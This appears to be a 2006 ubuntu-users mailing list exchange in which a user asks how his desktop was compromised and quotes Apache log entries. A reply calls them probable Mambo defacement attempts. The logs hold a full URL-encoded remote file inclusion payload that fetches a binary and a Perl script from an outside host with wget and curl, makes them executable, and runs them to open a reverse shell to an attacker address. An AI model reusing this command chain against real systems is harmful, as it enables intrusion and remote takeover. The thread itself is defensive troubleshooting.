My home desktop was compromised, but how?

Carthik Sharma carthik at gmail.com
Wed Mar 1 04:04:10 UTC 2006


On 2/28/06, Dennis Kaarsemaker <dennis at kaarsemaker.net> wrote:
> On di, 2006-02-28 at 15:44 -0500, Carthik Sharma wrote:
> > Somebody seems to have hacked into my desktop/server. I find files in
> > the /tmp/ (like "agent.8213)directory which I cannot open, these are
> > setuid-ed -- how do I open these?
>
> These may vere well be normal, many applications place thing in /tmp.
>
> Try sudo ls /tmp/agent.8213 to see the contents

I tried sudo vi agent.8213 and got a "permission denied" message.

>
> > In my apache access logs, there are things like
> > "http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%
> > 20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%
> > 208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt
> > %20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%
> > 20http://216.99.218.183/cback;chmod%20744%20cback;./cback%
> > 20217.160.242.90%208081;curl%20-o%20dc.txt%
> > 20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%
> > 20217.160.242.90%208081;echo%20YYY;echo|"
> >
> > That above is a valid url, and will take you to a script to deface
> > someone's php script etc, I suppose. Now, how did this malicious
> > hacker get in my computer?
>

> That is just an attempt to deface a mambo site. If you don't use mambo:
> don't worry (anyone can request any weird looking url on your server,
> and it'll end up in your log). If you do run mambo: make sure you're up
> to date.

There ar many many more like the above, for all sorts of php - powered sites.

Now, in:

192.168.0.201 - - [26/Feb/2006:14:56:06 -0500] "GET
/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|
HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"

the 192.168.0.201 is the local ip address of my desktop -- Does this
mean that 192.168.0.201 was the "origin" of the request? This is what
had me worried -- my desktop making requests for pages on itself,
without my intending to. So I thought there was a script at work.

I had to pull out the ehternet cable to be able to login, this being
an old Pentium-III computer and all.

Thanks for your guidance.
Carthik.
> --
> Dennis K.
>  - Linux for human beings - http://www.ubuntu.com
>  - Linux voor normale mensen - htp://www.ubuntu-nl.org
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.2.1 (GNU/Linux)
>
> iD8DBQBEBMQ3+NyYg7UqchYRArwYAJ940yd6c5P+9jFgHTFK7wQ5m7ZNlgCglmeG
> +n1Us0coGcAp8K3rr8Hw87w=
> =zW7o
> -----END PGP SIGNATURE-----
>
>
> --
> ubuntu-users mailing list
> ubuntu-users at lists.ubuntu.com
> https://lists.ubuntu.com/mailman/listinfo/ubuntu-users
>
>
>


--
Ph.D. Candidate
University of Central Florida
Homepage: http://carthik.net


More information about the ubuntu-users mailing list